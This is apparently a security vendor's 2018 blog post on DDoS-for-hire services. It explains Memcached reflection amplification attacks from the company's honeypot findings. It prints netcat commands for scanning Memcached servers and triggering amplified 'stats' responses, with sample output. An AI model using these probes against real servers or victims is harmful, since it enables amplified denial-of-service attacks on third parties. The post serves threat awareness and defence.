June 4, 2018
As DDoS-for-hire services will surely become cheaper, protecting your network resources from future attacks is not an option.
The recent crackdown on DDoS-for-hire website WebStresser is applaudable, but it is just the tip of an iceberg. The site had more than 136,000 registered users, meaning that demand for DDoS attacks from business rivals, haters and former employees is huge and that they are willing to pay for it.
If history is any guide, other dark web service sites will quickly fill the void. What’s more, the cost of such DDoS-for-hire services will continue to decrease, as new vulnerabilities and techniques allow attackers to fire junk traffic in a more cost-effective way.
One powerful, highly cost-effective attack tool that has recently been discovered is Memcached servers deployed by high-traffic websites, infrastructure and DNS providers. By sending a simple UDP request using a spoofed IP address, an attacker can reflect massively amplified attacks via unprotected Memcached servers.
To demystify Memcached-powered DDoS attacks, our research team put up a honeypot to disguise as an open Memcached server. That allows us to understand their techniques, trace back the botnets, and identify who the victims are.
Our honeypot records reveal that they take a two-step approach to first identify unsecured Memcached servers they can abuse; followed by the reflecting oversized packets to the designated victims.
Step 1: Scout for abusable Memcached servers
In the scanning process, attackers first send a “version” or “gets” request to the source IP addresses of Memcached servers to identify available and abusable machines.
Because the packet size of the response answering these two types of requests is marginally smaller than the packet size of the request itself, it does not cause bandwidth overflow to the sender, or the attacker.
“version” request
|
xxxx@xxxxxxxxxx:~# echo -en "\x00\x00\x00\x00\x00\x01\x00\x00version\r\n" | nc -q1 -u \ xxx.xxx.xxx.xxx 11211 |
“get” request
|
xxxx@xxxxxxxxxx:~# echo -en "\x00\x00\x00\x00\x00\x01\x00\x00gets a b c d e f g h j k l m n o p q r s t w v u x y a \ |
Step 2: Attack in action
Once an abusable Memcached server has been identified, the “stats” request is then sent from a spoofed IP address to that server to reflect amplified response packets to the victim.
|
xxxx@xxxxxxxxxx:~# echo -en "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n" | nc -q1 -u \ xxx.xxx.xxx.xxx 11211 STAT pid 9302 STAT uptime 1316 STAT time 1524625314 STAT version 1.4.13 STAT libevent 2.0.19-stable STAT pointer_size 64 STAT rusage_user 2.508156 STAT rusage_system 1.420088 STAT curr_connections 8 . . . . STAT hash_power_level 16 STAT hash_bytes 524288 STAT hash_is_expanding 0 STAT expired_unfetched 0 STAT evicted_unfetched 0 STAT bytes 0 STAT curr_items 0 STAT total_items 0 STAT evictions 0 STAT reclaimed 0 END |
In a series of attacks we observed through the honeypot, a small-sized request of 15 bytes was answered by an oversized response at 1,052 bytes, more than 70 times larger than the original request.
Given nowadays sophisticated attackers’ ability to mobilize a large number of botnets, the magnitude of Memcached server-generated attacks could easily go beyond the terabit threshold.
From the Mira code and insecure IoT devices to vulnerable Memcached servers, it is obvious that cybercriminals not only seek to expand DDoS botnets at their command, but are also on the lookout for new weapons that can increase attack efficiency and lower cost.
Very soon, attacks fired by DDoS-for-hire will be bigger and better, but come cheaper and more affordable to amateurs and unskilled attackers. Without a proper protection, your online presence and business reputation are at stake.
Note: Stay tuned for our Q1 Threat Report, in which, the honeypot results will be detailed.
